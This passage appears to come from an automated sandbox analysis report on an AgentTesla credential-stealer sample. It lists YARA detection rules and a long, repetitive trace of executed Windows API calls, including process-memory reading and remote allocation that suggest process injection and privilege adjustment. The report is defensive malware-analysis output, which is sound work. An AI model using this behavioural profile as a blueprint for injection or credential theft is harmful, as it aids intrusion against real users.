                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000027.00000002.2169471559.0000000002B11000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000027.00000002.2169471559.0000000002B11000.00000004.00000001.sdmp, Author: Joe Security

                                                      Disassembly

                                                      Code Analysis

                                                        Executed Functions

                                                        APIs
                                                        • KiUserExceptionDispatcher.NTDLL ref: 003618A8
                                                        • KiUserExceptionDispatcher.NTDLL ref: 003618BA
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2160569504.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                        Similarity
                                                        • API ID: DispatcherExceptionUser
                                                        • String ID:
                                                        • API String ID: 6842923-0
                                                        • Opcode ID: d78f5d04191862454971f975afdcede87c0cd7b49bb5e9567b61f1096cb07391
                                                        • Instruction ID: 6c2041c411e0c2c23d2e28f04074ed90924694809df0ec851c52dfb226843ff5
                                                        • Opcode Fuzzy Hash: d78f5d04191862454971f975afdcede87c0cd7b49bb5e9567b61f1096cb07391
                                                        • Instruction Fuzzy Hash: 31E09274E042089F8744EFB8E95456E7BF5BB48300B1045ADC809EB798EBB09E51CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00364D8E
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2160569504.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: de17e0313b0acafa1f8663bcb922a3876b40258e8e24b5aee140c51dbbfe6e3d
                                                        • Instruction ID: a6d21c81062614ec8a3d9f6784a1d14e5d6c965308c14d259dff726751fe5812
                                                        • Opcode Fuzzy Hash: de17e0313b0acafa1f8663bcb922a3876b40258e8e24b5aee140c51dbbfe6e3d
                                                        • Instruction Fuzzy Hash: 27919B70D006199FDF11CFA8C8817EEBBB2FF48304F158569E808A7294DB759A81CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00364640
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2160569504.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00364640
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2160569504.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0036407E
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2160569504.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2159945890.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2159945890.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Executed Functions

                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01D0AD37
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01D0AD37
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01D0B329
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01D0B329
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 025F099C
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 025F01D0
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 025F072D
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 025F0DD6
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,9B7E4B62,00000000,00000000,00000000,00000000), ref: 01D0BDBC
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,9B7E4B62,00000000,00000000,00000000,00000000), ref: 01D0AFBE
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 025F109E
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,9B7E4B62,00000000,00000000,00000000,00000000), ref: 01D0B0AE
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • EnumWindows.USER32(?,00000E9C,?,?), ref: 01D0A23E
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumWindows
                                                        • String ID:
                                                        • API String ID: 1129996299-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,9B7E4B62,00000000,00000000,00000000,00000000), ref: 025F0819
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 025F0502
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 025F072D
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,9B7E4B62,00000000,00000000,00000000,00000000), ref: 025F08E5
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01D0A94A
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 025F0DD6
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,9B7E4B62,00000000,00000000,00000000,00000000), ref: 01D0BDBC
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,9B7E4B62,00000000,00000000,00000000,00000000), ref: 01D0B0AE
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 025F0FB0
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 01D0BB2F
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: BufferConsoleInfoScreen
                                                        • String ID:
                                                        • API String ID: 3437242342-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01D0AB1A
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 025F1148
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,9B7E4B62,00000000,00000000,00000000,00000000), ref: 01D0AFBE
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01D0BA7E
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,9B7E4B62,00000000,00000000,00000000,00000000), ref: 025F08E5
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: Flags
                                                        • String ID:
                                                        • API String ID: 3401871038-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 025F132F
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 025F0640
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01D0AB1A
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01D0AA71
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 025F099C
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,9B7E4B62,00000000,00000000,00000000,00000000), ref: 025F0819
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01D0ABC9
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01D0BA7E
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • EnumWindows.USER32(?,00000E9C,?,?), ref: 01D0A23E
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumWindows
                                                        • String ID:
                                                        • API String ID: 1129996299-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 025F109E
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 025F01D0
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 01D0BB2F
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: BufferConsoleInfoScreen
                                                        • String ID:
                                                        • API String ID: 3437242342-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 025F132F
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01D0A94A
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 025F0FB0
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 025F0502
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 025F0640
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01D0ABC9
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 025F1148
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101932155.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: Flags
                                                        • String ID:
                                                        • API String ID: 3401871038-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01D0AA71
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01D0A9C8
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01D0A9C8
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098691400.0000000001D0A000.00000040.00000001.sdmp, Offset: 01D0A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2102816800.0000000002B20000.00000040.00000001.sdmp, Offset: 02B20000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2101921482.00000000025A0000.00000040.00000040.sdmp, Offset: 025A0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098686883.0000000001D02000.00000040.00000001.sdmp, Offset: 01D02000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2098686883.0000000001D02000.00000040.00000001.sdmp, Offset: 01D02000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Executed Functions

                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01D5AD37
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01D5AD37
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01D5B329
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01D5B329
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2101338367.0000000001D5A000.00000040.00000001.sdmp, Offset: 01D5A000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 028201D0
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2104758828.0000000002820000.00000040.00000001.sdmp, Offset: 02820000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0282072D
